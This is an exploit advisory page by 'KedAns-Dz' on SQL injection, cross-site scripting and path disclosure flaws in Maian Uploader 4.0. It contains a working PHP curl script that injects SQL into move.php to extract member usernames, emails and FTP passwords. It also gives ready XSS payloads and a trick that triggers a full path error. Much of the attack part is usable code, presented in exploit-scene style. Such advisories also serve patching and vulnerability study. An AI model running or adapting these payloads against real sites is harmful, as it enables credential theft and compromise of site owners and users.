Maian Uploader 4.0 XSS / SQL Injection / Disclosure

2014.01.24
Credit: KedAns-Dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright &#169; 2014 | Dz Offenders Cr3w ]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ###################################################################### # # [>] Title : Maian Uploader v4.0 <= (SQLi/Disclosure/XSS) Vulnerabilities # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : SQL Injection , Cross-Site Scripting , Full Path Disclosure # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [>] ^_^ Greetings to 1337day Users/FAN's <3 *_* , i'm leaving 1337day # [-] F-ck Hacking , LuV Exploiting .. Penetration-Testing rouls # ###################################################################### # # [!] Description : # # Maian Uploader v4.0 is suffer from multiple vulnerabilities # remote attacker can exploit some bugs like SQL Injection , XSS # and disclosure the target full path. # # [!] CWE = CWE-89 , CWE-22 , CWE-352 # #### # # [+] Exploit (1) ' SQL Injection ' => # # <?php # # /* # # - move.php (lines: 90 > 92 ) # $q_acc = mysql_query("SELECT id,username FROM ".$database['prefix']."members # WHERE id != '".$_POST['id']."' # ORDER BY accname") or die(mysql_error()); # # */ # # $sqli = "SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,ftp_user,0x3a,ftp_pass SEPARATOR 0x2c20) FROM mu_members"; # # $ch = curl_init(); # curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); # curl_setopt($ch, CURLOPT_URL, "http://[target]/[path]/admin/data_files/move.php"); # curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); # curl_setopt($ch, CURLOPT_POST, 1); # curl_setopt($ch, CURLOPT_POSTFIELDS, "id=$sqli"); # $exploit = curl_exec ($ch); # curl_close($ch); # unset($ch); # echo $exploit; # ?> # #### # # [+] Exploit (2) ' XSRF/XSS ' => # # - load_flv.js.php ( line : 25 ) # document.write('<object type="application/x-shockwave-flash" ..... # width="<?php echo $_GET['width']; ?>" # height="<?php echo $_GET['height']; ?> # # XSS : "><h1>XsS by KedAns-Dz</h1> # XSS : "><script>Alert('XsS by KedAns-Dz');</script> # # http://127.0.0.1/uploader/admin/js/load_flv.js.php?width=[ XSS ] # http://127.0.0.1/uploader/js/load_flv.js.php?width=[ XSS ] # # [&] Exploit (3) ' Full Path Disclosure ' => # # don't put ( &height= ) after width Xss and you get error # Notice about ( Undefined index: height ) with the Full Path Dir. # ###################################################################### #### # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !> # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )= ####


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top